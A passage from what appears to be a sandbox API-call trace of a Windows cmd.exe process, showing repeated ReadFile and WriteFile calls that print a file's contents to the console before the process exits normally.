lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] GetFileType (hFile=0x4c) returned 0x1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] GetFileType (hFile=0x4c) returned 0x1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] GetFileType (hFile=0x4c) returned 0x1 [0208.885] _get_osfhandle (_FileHandle=1) returned 
0x4c [0208.885] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] GetFileType (hFile=0x4c) returned 0x1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] GetFileType (hFile=0x4c) returned 0x1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.886] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.886] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.886] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.886] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] GetFileType (hFile=0x4c) returned 0x1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] GetFileType (hFile=0x4c) returned 0x1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) 
returned 1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] GetFileType (hFile=0x4c) returned 0x1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] GetFileType (hFile=0x4c) returned 0x1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] GetFileType (hFile=0x4c) returned 0x1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] GetFileType (hFile=0x4c) returned 0x1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] GetFileType (hFile=0x4c) returned 0x1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.887] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0208.887] GetFileType (hFile=0x4c) returned 0x1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.887] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.887] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.887] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.887] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] GetFileType (hFile=0x4c) returned 0x1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] GetFileType (hFile=0x4c) returned 0x1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] GetFileType (hFile=0x4c) returned 0x1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] GetFileType (hFile=0x4c) returned 0x1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] GetFileType (hFile=0x4c) returned 0x1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] GetFileType (hFile=0x4c) returned 0x1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] GetFileType (hFile=0x4c) returned 0x1 [0208.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.887] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] GetFileType (hFile=0x4c) returned 0x1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.888] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.888] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.888] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.888] ReadFile 
(in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] GetFileType (hFile=0x4c) returned 0x1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] GetFileType (hFile=0x4c) returned 0x1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] GetFileType (hFile=0x4c) returned 0x1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] GetFileType (hFile=0x4c) returned 0x1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] GetFileType (hFile=0x4c) returned 0x1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] GetFileType (hFile=0x4c) returned 0x1 [0208.888] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0208.888] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] GetFileType (hFile=0x4c) returned 0x1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] GetFileType (hFile=0x4c) returned 0x1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.889] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.889] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.889] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.889] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] GetFileType (hFile=0x4c) returned 0x1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] GetFileType (hFile=0x4c) returned 0x1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, 
lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] GetFileType (hFile=0x4c) returned 0x1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] GetFileType (hFile=0x4c) returned 0x1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.889] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] GetFileType (hFile=0x4c) returned 0x1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] GetFileType (hFile=0x4c) returned 0x1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] GetFileType (hFile=0x4c) returned 0x1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, 
lpOverlapped=0x0) returned 1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] GetFileType (hFile=0x4c) returned 0x1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.890] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.890] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.890] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.890] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] GetFileType (hFile=0x4c) returned 0x1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] GetFileType (hFile=0x4c) returned 0x1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] GetFileType (hFile=0x4c) returned 0x1 [0208.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.890] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] GetFileType (hFile=0x4c) returned 0x1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] WriteFile (in: hFile=0x4c, 
lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] GetFileType (hFile=0x4c) returned 0x1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] GetFileType (hFile=0x4c) returned 0x1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] GetFileType (hFile=0x4c) returned 0x1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] GetFileType (hFile=0x4c) returned 0x1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.891] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.891] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.891] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0208.891] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] GetFileType (hFile=0x4c) returned 0x1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] GetFileType (hFile=0x4c) returned 0x1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] GetFileType (hFile=0x4c) returned 0x1 [0208.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.891] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] GetFileType (hFile=0x4c) returned 0x1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] GetFileType (hFile=0x4c) returned 0x1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] 
GetFileType (hFile=0x4c) returned 0x1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] GetFileType (hFile=0x4c) returned 0x1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] GetFileType (hFile=0x4c) returned 0x1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.892] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.892] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x32, lpOverlapped=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] GetFileType (hFile=0x4c) returned 0x1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] GetFileType (hFile=0x4c) returned 0x1 [0208.892] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.892] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | 
out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x32, lpOverlapped=0x0) returned 1 [0208.892] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.892] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.893] _close (_FileHandle=4) returned 0 [0208.893] FindNextFileW (in: hFindFile=0x1e0e50, lpFindFileData=0x16f24c | out: lpFindFileData=0x16f24c) returned 0 [0209.258] GetLastError () returned 0x12 [0209.258] FindClose (in: hFindFile=0x1e0e50 | out: hFindFile=0x1e0e50) returned 1 [0209.258] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0209.259] _close (_FileHandle=3) returned 0 [0209.259] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.259] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0209.259] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.259] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0209.260] _get_osfhandle (_FileHandle=0) returned 0x3 [0209.260] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0209.260] SetConsoleInputExeNameW () returned 0x1 [0209.260] GetConsoleOutputCP () returned 0x1b5 [0209.260] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0209.260] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.260] exit (_Code=0) Process: id = "507" image_name = "cmd.exe" filename = 